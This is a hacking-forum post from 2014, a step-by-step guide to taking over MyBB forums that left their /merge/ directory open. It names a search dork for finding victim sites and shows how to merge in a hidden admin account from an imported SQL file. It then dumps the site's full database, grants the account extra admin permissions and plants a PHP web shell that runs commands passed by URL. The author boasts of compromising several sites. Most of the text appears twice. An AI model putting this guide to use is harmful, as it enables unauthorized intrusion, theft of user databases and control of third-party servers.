MyBB Exploitation via Open Merge Directory 02-13-2014, 07:06 AM
#1
I've compromised a few sites with this. Oni was the first one to tell me about this, and was rather shocked that I never thought of it myself. I guess you could call it a 0day (as people have been) but it's not really a vulnerability and is just admin stupidity. Yes this is how ForumKorner was compromised (not by me) along with a ton of others. I was not the first to find/think of this method but I am the one writing the tutorial.
What will be supplied in this tutorial?
Starting Off
You're going to want to download the following SQL file:
http://www.multiupload.nl/XDX7UW82FU
Create an account on db4free.net then login, go to phpMyAdmin then select the database you created, then import. Select this downloaded file and you're golden.
Contains 1 administrator account as the SECONDARY usergroup, so you do not look like an administrator on the online page on the online list. The default password for the account is "ballsack"
Now you are going to want to find yourself a forum that has left the merge directory up. My favourite way of doing this is looking through my popular emails Junk folder to see "blah blah forum" and to know that you have not signed up to this forum. Once you've found your forum, go to /merge/ and see if it's still up.
However we can also use dorks to find the merge directory open on random forums (if you're a newb and don't want to target forums specifically).
Exploiting The Merge Directory
Once you have found your site with the open merge directory, you will be challenged with a page which looks similar to the following:
![[Image: 6Ub5K.png]](http://puu.sh/6Ub5K.png)
Click on "Next". Make sure the two files are writeable then click "Next" again. Now select "MyBB 1.6 (Merge)" and then click "Next".
You will now be challenged with a page like this:
![[Image: 6Ub9D.png]](http://puu.sh/6Ub9D.png)
On Database Configuration click "Run" and you will be challenged with a page like this:
![[Image: 6Ubdl.png]](http://puu.sh/6Ubdl.png)
This is where you're going to need the details you created earlier with db4free.net. Fill out the information (host is db4free.net) like this, but obviously replace my details with yours:
![[Image: 6Ubhe.png]](http://puu.sh/6Ubhe.png)
Make sure you have entered your details correctly then click "Next".
Now run the Usergroups, and once that's completed run the Users. When you run the users you will face a page like so:
![[Image: 6Ubly.png]](http://puu.sh/6Ubly.png)
This is nothing to worry about, and as we have only 1 user we need not change any settings, so just click "Next".
Success! We have now successfully merged in our user. Do not merge anything else into the database (this would be pointless anyway as there's nothing to merge into). Instead just browse to the very bottom and click "Cleanup". Do not worry about the "Completion" page. Just go straight back to the forum and login with your user details!
As you can see from the online list on the main board, we look like a regular user!
![[Image: 6Ubuk.png]](http://puu.sh/6Ubuk.png)
Now navigate to the ACP link (Admin CP). Login with your details there! Now, you can stop here and have some fun, or continue on with the tutorial to find some more l33t shit.
Downloading The Database Correctly
There's a bitching feature in MyBB which allows you to download databases directly from the ACP itself. Head on over to the Tools and Maintenence tab, then select "Database Backups" from the left hand side. Click "New Backup".
We will now have something similar to this:
![[Image: 6UbEi.png]](http://puu.sh/6UbEi.png)
You want to "Select All", change the filetype to Plain Text and then click "Perform Backup" like so:
![[Image: 6UbIj.png]](http://puu.sh/6UbIj.png)
There you have it, a shiny new database!
Accessing The Server Beyond MyBB
This is a tricky one, and isn't the easiest. This one requires the forum plugin "Page Manager". There's a funny little problem with this plugin however, whereas it doesn't by default give every administrator the power to use it, only the super administrator, however we can still set ourselves to have access? Hmm.
Here's how you do it. Head on over to the main admin index again and select "Plugins" from the list on the left hand side. Search through the list and see if "Page Manager" is installed, if so, we're in luck! Now go on over to the Users & Groups tab and select "Admin Permissions" from the left hand side. Select your username (yolo420blaze) and then CTRL + F for "manage pages" and select "Yes".
Now save, and we can now access the page manager! Go to the Forums & Posts tab and select Page Manager from the left hand side. Now create a new page and make sure it doesn't show on the online list, but is live. Now you're going to use the following (but incredibly public) backdoor to be able to access a command line shell on the server:
What this does, is tells the to basically request the command you enter. Now head on over to the url created. It should be something like so:
Now, to retreive commands from the server, do the following to your url:
ls retreives all files in that directory. I suggest looking at an earlier tutorial of mine which shows some fun things to mess around with here: http://www.sinister.ly/thread-how-to-fin...ploitation
God damnit If I spent half the time I spent on this tutorial I'd be near finishing my work by now. I hate you guys. This is probably one of the longer tutorials I have wrote. I'm fucking tired, so excuse any grammatical errors. I'll proof read when I wake up.
Go try it on these forums: http://www.sinister.ly/thread-challenge-mybb-pwning
Well, I hope you enjoy this.
What will be supplied in this tutorial?
- A detailed tutorial on hacking MyBB sites through open merge directory
- How to shell a server once inside the MyBB administrator panel
- A SQL database containing an admin user for MyBB forums (most recent)
- Awesomeness
Starting Off
You're going to want to download the following SQL file:
http://www.multiupload.nl/XDX7UW82FU
Create an account on db4free.net then login, go to phpMyAdmin then select the database you created, then import. Select this downloaded file and you're golden.
Contains 1 administrator account as the SECONDARY usergroup, so you do not look like an administrator on the online page on the online list. The default password for the account is "ballsack"
Now you are going to want to find yourself a forum that has left the merge directory up. My favourite way of doing this is looking through my popular emails Junk folder to see "blah blah forum" and to know that you have not signed up to this forum. Once you've found your forum, go to /merge/ and see if it's still up.
However we can also use dorks to find the merge directory open on random forums (if you're a newb and don't want to target forums specifically).
Code:
intext:"MyBB Merge System - Version:" inurl:"/merge"
This is just an example dork which returns ONE result. Play around with this, don't make me spoonfeed you dorks. Be creative.Exploiting The Merge Directory
Once you have found your site with the open merge directory, you will be challenged with a page which looks similar to the following:
![[Image: 6Ub5K.png]](http://puu.sh/6Ub5K.png)
Click on "Next". Make sure the two files are writeable then click "Next" again. Now select "MyBB 1.6 (Merge)" and then click "Next".
You will now be challenged with a page like this:
![[Image: 6Ub9D.png]](http://puu.sh/6Ub9D.png)
On Database Configuration click "Run" and you will be challenged with a page like this:
![[Image: 6Ubdl.png]](http://puu.sh/6Ubdl.png)
This is where you're going to need the details you created earlier with db4free.net. Fill out the information (host is db4free.net) like this, but obviously replace my details with yours:
![[Image: 6Ubhe.png]](http://puu.sh/6Ubhe.png)
Make sure you have entered your details correctly then click "Next".
Now run the Usergroups, and once that's completed run the Users. When you run the users you will face a page like so:
![[Image: 6Ubly.png]](http://puu.sh/6Ubly.png)
This is nothing to worry about, and as we have only 1 user we need not change any settings, so just click "Next".
Success! We have now successfully merged in our user. Do not merge anything else into the database (this would be pointless anyway as there's nothing to merge into). Instead just browse to the very bottom and click "Cleanup". Do not worry about the "Completion" page. Just go straight back to the forum and login with your user details!
As you can see from the online list on the main board, we look like a regular user!
![[Image: 6Ubuk.png]](http://puu.sh/6Ubuk.png)
Now navigate to the ACP link (Admin CP). Login with your details there! Now, you can stop here and have some fun, or continue on with the tutorial to find some more l33t shit.
Downloading The Database Correctly
There's a bitching feature in MyBB which allows you to download databases directly from the ACP itself. Head on over to the Tools and Maintenence tab, then select "Database Backups" from the left hand side. Click "New Backup".
We will now have something similar to this:
Spoiler:
![[Image: 6UbEi.png]](http://puu.sh/6UbEi.png)
You want to "Select All", change the filetype to Plain Text and then click "Perform Backup" like so:
Spoiler:
![[Image: 6UbIj.png]](http://puu.sh/6UbIj.png)
There you have it, a shiny new database!
Accessing The Server Beyond MyBB
This is a tricky one, and isn't the easiest. This one requires the forum plugin "Page Manager". There's a funny little problem with this plugin however, whereas it doesn't by default give every administrator the power to use it, only the super administrator, however we can still set ourselves to have access? Hmm.
Here's how you do it. Head on over to the main admin index again and select "Plugins" from the list on the left hand side. Search through the list and see if "Page Manager" is installed, if so, we're in luck! Now go on over to the Users & Groups tab and select "Admin Permissions" from the left hand side. Select your username (yolo420blaze) and then CTRL + F for "manage pages" and select "Yes".
Now save, and we can now access the page manager! Go to the Forums & Posts tab and select Page Manager from the left hand side. Now create a new page and make sure it doesn't show on the online list, but is live. Now you're going to use the following (but incredibly public) backdoor to be able to access a command line shell on the server:
PHP Code:
<?php $cmd = <<<EOD
cmd
EOD;
if(isset($_REQUEST[$cmd])) {
system($_REQUEST[$cmd]); } ?>What this does, is tells the to basically request the command you enter. Now head on over to the url created. It should be something like so:
Code:
http://hackedsi.te/misc.php?action=yourpageNow, to retreive commands from the server, do the following to your url:
Code:
http://hackedsi.te/misc.php?action=yourpage&cmd=lsls retreives all files in that directory. I suggest looking at an earlier tutorial of mine which shows some fun things to mess around with here: http://www.sinister.ly/thread-how-to-fin...ploitation
God damnit If I spent half the time I spent on this tutorial I'd be near finishing my work by now. I hate you guys. This is probably one of the longer tutorials I have wrote. I'm fucking tired, so excuse any grammatical errors. I'll proof read when I wake up.
Go try it on these forums: http://www.sinister.ly/thread-challenge-mybb-pwning
Well, I hope you enjoy this.
















![[Image: F4Z9Dqw.png]](https://i.imgur.com/F4Z9Dqw.png)
![[+]](https://sinister.li/images/modern/collapse_collapsed.png)




![[Image: BXqGARG.png]](https://i.imgur.com/BXqGARG.png)









![[Image: 7ajmN5P.jpg]](https://i.imgur.com/7ajmN5P.jpg)






![[Image: dHJ4Beo.gif]](http://i.imgur.com/dHJ4Beo.gif)